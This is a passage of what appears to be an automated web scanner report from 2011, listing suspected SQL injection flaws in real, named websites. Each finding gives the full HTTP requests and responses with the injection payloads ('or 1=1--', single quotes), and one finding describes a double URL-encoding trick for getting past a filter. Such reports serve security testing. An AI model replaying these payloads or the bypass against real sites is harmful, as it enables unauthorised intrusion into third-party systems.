<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>
1.5. http://bizinformation.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14947488%20or%201%3d1--%20 and 14947488%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?114947488%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:16:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico?114947488%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:16:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 05 Oct 2010 10:04:29 GMT
ETag: "36e0002-e36-491dbc95ca540"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: image/x-icon

..............h...&... ..............(....... ...........@............................rP......L1.........`A..............}b..kO..U9......{Z......tX...........y..xY..oQ..........dH..Q5...{..}^......vT..hJ..lL......nM..tV..X:..x\..........yX..O3..qT......qR......z].._..mO..uV..aE..T9......tS..{[......X<..sR..........xX..z\..pN..rT..vU..xV..z^..}]..|_..iM..kM..........wV..yX..zZ..y[..........pP..sS..wZ..|[..{]..{`..|`......uV......N2..R6..cG..lN..qO..rQ..sQ..uS..uV..wW..{Y..zZ..{^..M1..U8..V9..W:..X;..........................oM..sQ..rR..sR..tR..sT..uT..uT..vV..xW..wW..zY..xY..xZ..xZ..y[..z\..{\..{_..L1......U8......lN..oN..pN..qO..rO..qP..rP..sQ..tR..sS..tS..uS..uS..vT..uU..vU..wU..xV..wV..xW..xW..zX..yX..zY..xX..{Y..xX..zY..yY..{Z..{[..{\..z\..|`..}_.....................................................................................................................................................................................................................................................................................................................................................f..3...T[)fYYYYYh8.%..BUU2Z..ZZZ*QDeo....    .Eg.0L..!......4.$ijF~..m.#...7'F?\....n.S.=W;../..v}.P:.6dyM.G., 1a.<s.......bO..C{{.9-.pl.X
..RK@.I.xk....V...c((5.r.N.^.....wz...t....&N+....J..".q.H........|u..qq......_A`.._.>>>.>>..].u]....>>>>>>>>>>>>>]>]................................................................(... ...@........................................qN......H,.......|..\<...]..h..............lN...g..d?..S7..|W......vZ..........}^...................t..N...kH..dH.......`.......g..fE..wU..]B...v.......o..T4......oP..N2..^..tT.......n......|b..X;.
...[SNIP]...
1.6. http://bizinformation.com/images/fl/0.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14518373'%20or%201%3d1--%20 and 14518373'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images14518373'%20or%201%3d1--%20/fl/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images14518373' or 1=1-- /fl/0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images14518373'%20or%201%3d2--%20/fl/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images14518373' or 1=2-- /fl/0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>
1.7. http://bizinformation.com/images/fl/0.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13133889'%20or%201%3d1--%20 and 13133889'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl13133889'%20or%201%3d1--%20/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl13133889' or 1=1-- /0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl13133889'%20or%201%3d2--%20/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl13133889' or 1=2-- /0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>
1.8. http://bizinformation.com/images/fl/0.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 44557888'%20or%201%3d1--%20 and 44557888'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl/0.gif44557888'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl/0.gif44557888' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl/0.gif44557888'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl/0.gif44557888' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>
1.9. http://bizinformation.com/images/fl/0.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10237900%20or%201%3d1--%20 and 10237900%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl/0.gif?110237900%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 518
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl/0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl/0.gif?110237900%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl/0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>
1.10. http://googleads.g.doubleclick.net/pagead/ads [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the p parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337375&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319374938&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319375158&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1733840726&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico'&fu=0&ifi=2&dtd=463&xpc=6JH0KYKhlO&p=http%3A//www.japanator.com%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:46:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>Avoid Failing checkpoints- assignments- finals</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337375&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319374938&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319375158&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1733840726&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico'&fu=0&ifi=2&dtd=463&xpc=6JH0KYKhlO&p=http%3A//www.japanator.com%2527%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:46:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
1.11. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:02:51 GMT
Server: lighttpd/1.4.28
Content-Length: 112250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.12. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/index_cblogs-mini.phtml'?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:03:14 GMT
Server: lighttpd/1.4.28
Content-Length: 112250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.13. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:59:49 GMT
Server: lighttpd/1.4.28
Content-Length: 112217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...
1.14. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

